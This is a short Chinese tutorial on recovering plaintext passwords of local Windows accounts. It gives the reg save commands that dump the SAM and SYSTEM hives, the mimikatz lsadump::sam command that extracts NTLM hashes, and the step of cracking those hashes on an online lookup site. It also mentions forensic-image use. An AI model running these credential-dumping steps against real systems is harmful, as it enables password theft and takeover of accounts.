破解Windows本地账户密码（拿到明文密码）_sam破译成明文的密码文件

破解Windows本地账户密码（拿到明文密码）

1.导出sam和system文件

以管理员身份运行CMD命令行工具

输入：
reg save hklm\sam sam.hive (本机密码)
reg save hklm\system system.hive (本机密码)

导出路径为当前目录

PE模式下（win预安装模式）或直接连接硬盘找 C:\windows\system32\config\sam和system文件

取证镜像模式下 找镜像文件下 C:\windows\system32\config\sam和system文件

2.读取sam和system文件获取Hash NTLM加密后的密码

mimikatz（实战工具有被杀的风险）（完整用法自行百度，我也不知道)
把sam.hive system.hive 或 sam system文件放在mimikatz.exe 同一目录下

以管理员身份运行mimikatz.exe

输入：
lsadump::sam /sam:sam.hive /system:system.hive
或
lsadump::sam /sam:sam /system:system
（主要看导出的sam和system文件是那种方法）

得到Hash NTLM加密后的密码

3.在线网站在线破解密码例如：www.cmd5.com 拿到明文密码

结束